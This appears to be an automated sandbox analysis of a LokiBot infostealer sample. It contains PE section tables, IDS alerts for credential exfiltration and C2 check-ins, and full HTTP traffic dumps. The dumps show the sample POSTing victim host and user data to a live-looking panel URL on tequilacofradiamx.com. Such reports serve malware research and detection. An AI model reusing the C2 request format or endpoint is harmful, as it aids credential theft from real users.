                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x50e240x57.text
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x5c0000x11ef.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x600000xc.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x5e0000x8
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x500000x48.text
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    C)Ez0x20000x4d0600x4d2001af5e25483f3eafa98a9c723699e021cFalse1.0003355449756888data7.99934222787656IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .text0x500000xb6700xb800d730ef1accab85da58f2651e0c404730False0.37814198369565216data4.675724005101443IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rsrc0x5c0000x11ef0x1200ad84c9ab355229a8dfe4bcd6a51bf268False0.5034722222222222data5.70986614175814IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    0x5e0000x100x200bc58d7111c20348ad0635eaf9dc32292False0.044921875data0.14263576814887827IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .reloc0x600000xc0x20031373f9c6aeda5023f8c8409dbb92c77False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_ICON0x5c1300x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.8226950354609929
                    RT_GROUP_ICON0x5c5980x14data1.1
                    RT_VERSION0x5c5ac0x370data0.39545454545454545
                    RT_MANIFEST0x5c91c0x8d3XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.3935369632580788
                    DLLImport
                    mscoree.dll_CorExeMain
                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    04/18/24-23:01:56.652272TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24973080192.168.2.491.92.253.228
                    04/18/24-23:01:58.789410TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973380192.168.2.491.92.253.228
                    04/18/24-23:01:56.652272TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973080192.168.2.491.92.253.228
                    04/18/24-23:01:58.045440TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973280192.168.2.491.92.253.228
                    04/18/24-23:01:58.045440TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973280192.168.2.491.92.253.228
                    04/18/24-23:01:58.045440TCP2825766ETPRO TROJAN LokiBot Checkin M24973280192.168.2.491.92.253.228
                    04/18/24-23:01:58.045440TCP2025381ET TROJAN LokiBot Checkin4973280192.168.2.491.92.253.228
                    04/18/24-23:01:57.372627TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973180192.168.2.491.92.253.228
                    04/18/24-23:01:57.372627TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24973180192.168.2.491.92.253.228
                    04/18/24-23:01:57.372627TCP2825766ETPRO TROJAN LokiBot Checkin M24973180192.168.2.491.92.253.228
                    04/18/24-23:01:57.372627TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14973180192.168.2.491.92.253.228
                    04/18/24-23:01:58.789410TCP2025381ET TROJAN LokiBot Checkin4973380192.168.2.491.92.253.228
                    04/18/24-23:01:56.652272TCP2025381ET TROJAN LokiBot Checkin4973080192.168.2.491.92.253.228
                    04/18/24-23:01:56.652272TCP2825766ETPRO TROJAN LokiBot Checkin M24973080192.168.2.491.92.253.228
                    04/18/24-23:01:56.652272TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14973080192.168.2.491.92.253.228
                    04/18/24-23:01:57.372627TCP2025381ET TROJAN LokiBot Checkin4973180192.168.2.491.92.253.228
                    04/18/24-23:01:58.045440TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973280192.168.2.491.92.253.228
                    04/18/24-23:01:58.789410TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973380192.168.2.491.92.253.228
                    04/18/24-23:01:58.789410TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973380192.168.2.491.92.253.228
                    04/18/24-23:01:58.789410TCP2825766ETPRO TROJAN LokiBot Checkin M24973380192.168.2.491.92.253.228
                    TimestampSource PortDest PortSource IPDest IP
                    Apr 18, 2024 23:01:56.453670025 CEST4973080192.168.2.491.92.253.228
                    Apr 18, 2024 23:01:56.650105953 CEST804973091.92.253.228192.168.2.4
                    Apr 18, 2024 23:01:56.650204897 CEST4973080192.168.2.491.92.253.228
                    Apr 18, 2024 23:01:56.652271986 CEST4973080192.168.2.491.92.253.228
                    Apr 18, 2024 23:01:56.848254919 CEST804973091.92.253.228192.168.2.4
                    Apr 18, 2024 23:01:56.848431110 CEST4973080192.168.2.491.92.253.228
                    Apr 18, 2024 23:01:57.044789076 CEST804973091.92.253.228192.168.2.4
                    Apr 18, 2024 23:01:57.045268059 CEST804973091.92.253.228192.168.2.4
                    Apr 18, 2024 23:01:57.045308113 CEST804973091.92.253.228192.168.2.4
                    Apr 18, 2024 23:01:57.045344114 CEST804973091.92.253.228192.168.2.4
                    Apr 18, 2024 23:01:57.045417070 CEST4973080192.168.2.491.92.253.228
                    Apr 18, 2024 23:01:57.045417070 CEST4973080192.168.2.491.92.253.228
                    Apr 18, 2024 23:01:57.045653105 CEST4973080192.168.2.491.92.253.228
                    Apr 18, 2024 23:01:57.175492048 CEST4973180192.168.2.491.92.253.228
                    Apr 18, 2024 23:01:57.241652966 CEST804973091.92.253.228192.168.2.4
                    Apr 18, 2024 23:01:57.369546890 CEST804973191.92.253.228192.168.2.4
                    Apr 18, 2024 23:01:57.369669914 CEST4973180192.168.2.491.92.253.228
                    Apr 18, 2024 23:01:57.372627020 CEST4973180192.168.2.491.92.253.228
                    Apr 18, 2024 23:01:57.566381931 CEST804973191.92.253.228192.168.2.4
                    Apr 18, 2024 23:01:57.566701889 CEST4973180192.168.2.491.92.253.228
                    Apr 18, 2024 23:01:57.760677099 CEST804973191.92.253.228192.168.2.4
                    Apr 18, 2024 23:01:57.760746956 CEST804973191.92.253.228192.168.2.4
                    Apr 18, 2024 23:01:57.760791063 CEST804973191.92.253.228192.168.2.4
                    Apr 18, 2024 23:01:57.760828972 CEST804973191.92.253.228192.168.2.4
                    Apr 18, 2024 23:01:57.760922909 CEST4973180192.168.2.491.92.253.228
                    Apr 18, 2024 23:01:57.760973930 CEST4973180192.168.2.491.92.253.228
                    Apr 18, 2024 23:01:57.847592115 CEST4973280192.168.2.491.92.253.228
                    Apr 18, 2024 23:01:57.954878092 CEST804973191.92.253.228192.168.2.4
                    Apr 18, 2024 23:01:58.042484045 CEST804973291.92.253.228192.168.2.4
                    Apr 18, 2024 23:01:58.042579889 CEST4973280192.168.2.491.92.253.228
                    Apr 18, 2024 23:01:58.045439959 CEST4973280192.168.2.491.92.253.228
                    Apr 18, 2024 23:01:58.239928961 CEST804973291.92.253.228192.168.2.4
                    Apr 18, 2024 23:01:58.240035057 CEST4973280192.168.2.491.92.253.228
                    Apr 18, 2024 23:01:58.434726000 CEST804973291.92.253.228192.168.2.4
                    Apr 18, 2024 23:01:58.434952021 CEST804973291.92.253.228192.168.2.4
                    Apr 18, 2024 23:01:58.434993982 CEST804973291.92.253.228192.168.2.4
                    Apr 18, 2024 23:01:58.435033083 CEST804973291.92.253.228192.168.2.4
                    Apr 18, 2024 23:01:58.435066938 CEST4973280192.168.2.491.92.253.228
                    Apr 18, 2024 23:01:58.435154915 CEST4973280192.168.2.491.92.253.228
                    Apr 18, 2024 23:01:58.435156107 CEST4973280192.168.2.491.92.253.228
                    Apr 18, 2024 23:01:58.591398001 CEST4973380192.168.2.491.92.253.228
                    Apr 18, 2024 23:01:58.629482031 CEST804973291.92.253.228192.168.2.4
                    Apr 18, 2024 23:01:58.786005974 CEST804973391.92.253.228192.168.2.4
                    Apr 18, 2024 23:01:58.786103010 CEST4973380192.168.2.491.92.253.228
                    Apr 18, 2024 23:01:58.789410114 CEST4973380192.168.2.491.92.253.228
                    Apr 18, 2024 23:01:58.984033108 CEST804973391.92.253.228192.168.2.4
                    Apr 18, 2024 23:01:58.984152079 CEST4973380192.168.2.491.92.253.228
                    Apr 18, 2024 23:01:59.179012060 CEST804973391.92.253.228192.168.2.4
                    Apr 18, 2024 23:01:59.179377079 CEST804973391.92.253.228192.168.2.4
                    Apr 18, 2024 23:01:59.179420948 CEST804973391.92.253.228192.168.2.4
                    Apr 18, 2024 23:01:59.179456949 CEST804973391.92.253.228192.168.2.4
                    Apr 18, 2024 23:01:59.179491997 CEST4973380192.168.2.491.92.253.228
                    Apr 18, 2024 23:01:59.179579020 CEST4973380192.168.2.491.92.253.228
                    Apr 18, 2024 23:02:00.892436028 CEST4973380192.168.2.491.92.253.228
                    TimestampSource PortDest PortSource IPDest IP
                    Apr 18, 2024 23:01:56.190624952 CEST6133453192.168.2.41.1.1.1
                    Apr 18, 2024 23:01:56.447998047 CEST53613341.1.1.1192.168.2.4
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Apr 18, 2024 23:01:56.190624952 CEST192.168.2.41.1.1.10x63a7Standard query (0)tequilacofradiamx.comA (IP address)IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Apr 18, 2024 23:01:56.447998047 CEST1.1.1.1192.168.2.40x63a7No error (0)tequilacofradiamx.com91.92.253.228A (IP address)IN (0x0001)false
                    • tequilacofradiamx.com
                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.44973091.92.253.228806464C:\Users\user\Desktop\lqoUUYTMsL.exe
                    TimestampBytes transferredDirectionData
                    Apr 18, 2024 23:01:56.652271986 CEST290OUTPOST /minyhug/fxgsfhsdtytdjfudyjfjewrwsejyt/Panel/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: tequilacofradiamx.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: D0B62332
                    Content-Length: 176
                    Connection: close
                    Apr 18, 2024 23:01:56.848431110 CEST176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 30 00 34 00 31 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: 'ckav.rujones216041JONES-PCk0FDD42EE188E931437F4FBE2CoQjSb
                    Apr 18, 2024 23:01:57.045268059 CEST1289INHTTP/1.1 404 Not Found
                    Date: Thu, 18 Apr 2024 21:01:57 GMT
                    Server: Apache/2.2.15 (CentOS)
                    Last-Modified: Wed, 17 Apr 2024 06:00:48 GMT
                    ETag: "6164b-587-616449379118c"
                    Accept-Ranges: bytes
                    Content-Length: 1415
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 61 63 74 69 76 65 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f
                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Page Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="404 - Page Not Found"/> <style type="text/css"> body {font-size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-spacing: -1px; margin: -3px 0 39px;} p {width:375px; text-align:center; margin-left:auto;margin-right:auto; margin-top: 30px } div {width:375px; text-align:center; margin-left:auto;margin-right:auto;} a:link {color: #34536A;} a:visited {color: #34536A;} a:active {color: #34536A;} a:hover {color: #34536A;} </style></head><bo
                    Apr 18, 2024 23:01:57.045308113 CEST403INData Raw: 64 79 3e 0a 20 20 20 20 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 74 65 71 75 69 6c 61 63 6f 66 72 61 64 69 61 6d 78 2e 63 6f 6d 2f 22 3e 74 65 71 75 69 6c 61 63 6f 66 72 61 64 69 61 6d 78 2e 63 6f 6d 3c 2f 61 3e 3c 2f 70 3e 0a 20
                    Data Ascii: dy> <p><a href="http://tequilacofradiamx.com/">tequilacofradiamx.com</a></p> <h1>404</h1> <h2>Page Not Found</h2> <div> The page you were trying to reach does not exist. Or, maybe it has moved. You can start aga


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.44973191.92.253.228806464C:\Users\user\Desktop\lqoUUYTMsL.exe
                    TimestampBytes transferredDirectionData
                    Apr 18, 2024 23:01:57.372627020 CEST290OUTPOST /minyhug/fxgsfhsdtytdjfudyjfjewrwsejyt/Panel/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: tequilacofradiamx.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: D0B62332
                    Content-Length: 176
                    Connection: close
                    Apr 18, 2024 23:01:57.566701889 CEST176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 30 00 34 00 31 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: 'ckav.rujones216041JONES-PC+0FDD42EE188E931437F4FBE2CvReyt
                    Apr 18, 2024 23:01:57.760746956 CEST1289INHTTP/1.1 404 Not Found
                    Date: Thu, 18 Apr 2024 21:01:58 GMT
                    Server: Apache/2.2.15 (CentOS)
                    Last-Modified: Wed, 17 Apr 2024 06:00:48 GMT
                    ETag: "6164b-587-616449379118c"
                    Accept-Ranges: bytes
                    Content-Length: 1415
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 61 63 74 69 76 65 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f
                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Page Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="404 - Page Not Found"/> <style type="text/css"> body {font-size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-spacing: -1px; margin: -3px 0 39px;} p {width:375px; text-align:center; margin-left:auto;margin-right:auto; margin-top: 30px } div {width:375px; text-align:center; margin-left:auto;margin-right:auto;} a:link {color: #34536A;} a:visited {color: #34536A;} a:active {color: #34536A;} a:hover {color: #34536A;} </style></head><bo
                    Apr 18, 2024 23:01:57.760791063 CEST403INData Raw: 64 79 3e 0a 20 20 20 20 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 74 65 71 75 69 6c 61 63 6f 66 72 61 64 69 61 6d 78 2e 63 6f 6d 2f 22 3e 74 65 71 75 69 6c 61 63 6f 66 72 61 64 69 61 6d 78 2e 63 6f 6d 3c 2f 61 3e 3c 2f 70 3e 0a 20
                    Data Ascii: dy> <p><a href="http://tequilacofradiamx.com/">tequilacofradiamx.com</a></p> <h1>404</h1> <h2>Page Not Found</h2> <div> The page you were trying to reach does not exist. Or, maybe it has moved. You can start aga


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.44973291.92.253.228806464C:\Users\user\Desktop\lqoUUYTMsL.exe
                    TimestampBytes transferredDirectionData
                    Apr 18, 2024 23:01:58.045439959 CEST290OUTPOST /minyhug/fxgsfhsdtytdjfudyjfjewrwsejyt/Panel/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: tequilacofradiamx.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: D0B62332
                    Content-Length: 149
                    Connection: close
                    Apr 18, 2024 23:01:58.240035057 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 30 00 34 00 31 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.rujones216041JONES-PC0FDD42EE188E931437F4FBE2C
                    Apr 18, 2024 23:01:58.434952021 CEST1289INHTTP/1.1 404 Not Found
                    Date: Thu, 18 Apr 2024 21:01:58 GMT
                    Server: Apache/2.2.15 (CentOS)
                    Last-Modified: Wed, 17 Apr 2024 06:00:48 GMT
                    ETag: "6164b-587-616449379118c"
                    Accept-Ranges: bytes
                    Content-Length: 1415
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
